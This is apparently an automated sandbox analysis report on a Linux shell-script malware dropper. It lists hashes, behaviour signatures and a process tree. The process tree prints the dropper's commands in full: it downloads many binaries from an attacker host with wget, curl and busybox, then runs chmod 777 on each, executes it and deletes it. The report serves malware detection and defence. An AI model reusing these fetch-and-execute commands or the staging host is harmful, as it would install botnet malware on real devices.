Analysis
-
max time kernel
141s -
max time network
146s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
-
Size
10KB
-
MD5
993a3e2f46840103a33a0ca2fc91dfe7
-
SHA1
678e29df40375ee97c70526b0218055aed855419
-
SHA256
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870
-
SHA512
0bac561038a79d408e79fa667d6a436f7a5dc10e34ab8cf42f4de8e94b30a60aa6239a43161fdbd33a93e41bb712493f51354ae68939b1648fdff8882868c307
-
SSDEEP
192:SrOVDDYRLNeA59BA77wizvDoVNRN8sDiWFvDoVNv8sDiWO9BA77W6GDDYR4Gh:SrOMNv9BA77TzvDoVNR/vDoVNO9BA77x
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 791 chmod 870 chmod 954 chmod 884 chmod 926 chmod 780 chmod 898 chmod 905 chmod 919 chmod 968 chmod 729 chmod 877 chmod 912 chmod 940 chmod 947 chmod 800 chmod 856 chmod 933 chmod 961 chmod 975 chmod 982 chmod 989 chmod 891 chmod 996 chmod 830 chmod 842 chmod 849 chmod 863 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 730 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb 781 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe 792 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS 802 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa 832 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs 843 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB 850 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG 857 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb 864 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 871 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 878 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG 885 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 892 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT 899 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 906 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT 913 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 920 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG 927 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb 934 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 941 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs 948 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB 955 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe 962 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS 969 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa 976 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb 983 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 990 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG 997 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 806 wget 845 wget 846 curl 867 curl 936 wget 732 wget 909 curl 932 busybox 979 curl 993 curl 795 curl 797 busybox 853 curl 869 busybox 880 wget 941 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 958 curl 731 rm 836 wget 848 busybox 883 busybox 887 wget 911 busybox 922 wget 960 busybox 974 busybox 985 wget 988 busybox 995 busybox 726 curl 765 curl 777 busybox 860 curl 908 wget 925 busybox 953 busybox 978 wget 785 curl 839 curl 897 busybox 728 busybox 841 busybox 901 wget 950 wget 730 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP 902 curl 904 busybox 855 busybox 890 busybox 942 rm 946 busybox 951 curl 986 curl 992 wget 794 wget 852 wget 862 busybox 937 curl 943 wget 957 wget 965 curl 784 wget 964 wget 971 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb curl File opened for modification /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 curl File opened for modification /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT curl File opened for modification /tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT curl File opened for modification /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs curl File opened for modification /tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs curl File opened for modification /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG curl File opened for modification /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe curl File opened for modification /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS curl File opened for modification /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa curl File opened for modification /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP curl File opened for modification /tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa curl File opened for modification /tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe curl File opened for modification /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB curl File opened for modification /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG curl File opened for modification /tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB curl File opened for modification /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb curl File opened for modification /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 curl File opened for modification /tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP curl File opened for modification /tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG curl File opened for modification /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 curl File opened for modification /tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb curl File opened for modification /tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb curl File opened for modification /tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7 curl File opened for modification /tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0 curl File opened for modification /tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1 curl File opened for modification /tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS curl File opened for modification /tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG curl
Processes
-
/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵PID:704
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:730
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:731
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:784
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:790
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:793
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:828
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:876
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:918
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:929
-
-
